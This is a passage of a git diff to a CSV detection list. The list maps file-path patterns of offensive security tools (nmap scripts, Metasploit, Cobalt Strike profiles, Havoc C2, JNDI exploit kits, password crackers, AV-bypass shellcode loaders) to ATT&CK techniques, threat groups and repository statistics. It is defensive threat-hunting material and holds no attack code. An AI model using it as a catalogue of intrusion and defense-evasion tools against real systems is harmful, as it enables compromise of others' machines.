+"*/IPfuscation.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/ip-geolocation-geoplugin.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-geolocation-ipinfodb.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-geolocation-map-bing.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4051,7 +4073,7 @@ "*/ip-geolocation-maxmind.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-https-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipidseq.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/ipmi_passwords.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/ipmi_passwords.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/ipmi-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipmi-cipher-zero.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipmi-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4063,7 +4085,7 @@ "*/irc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-sasl-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-unrealircd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/irs.exe*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*/irs.exe*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*/iscsi-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/iscsi-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/isns-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4072,7 +4094,7 @@ "*/jaff.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/jas502n/CVE-2020-5902*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*/jasperloader.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*/java/jndi/RMIRefServer.java*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","715","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*/java/jndi/RMIRefServer.java*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" "*/jdwp-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/jdwp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/jdwp-inject.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4081,17 +4103,17 @@ "*/Jira-Lens.git*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" "*/Jira-Lens/*","offensive_tool_keyword","RedTeam_toolkit","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" "*/JoelGMSec/PyShell*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" -"*/john -*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/john -*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/john.git*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" -"*/john/run/*.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/john/run/*.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/JohnTheRipper*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/john/run/*.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/john/run/*.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/JohnTheRipper*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/Jormungandr.git*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*/js/stage.js*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/js_inject.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/juicypotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/juicypotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/JuicyPotatoNG.git*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" -"*/Jump-exec/Psexec*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/Jump-exec/Psexec*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/K8_CS_*_*.rar*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*/k8gege/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*/k8gege/scrun/*","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/scrun","1","1","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" @@ -4104,37 +4126,39 @@ "*/kdstab.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*/KDStab.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 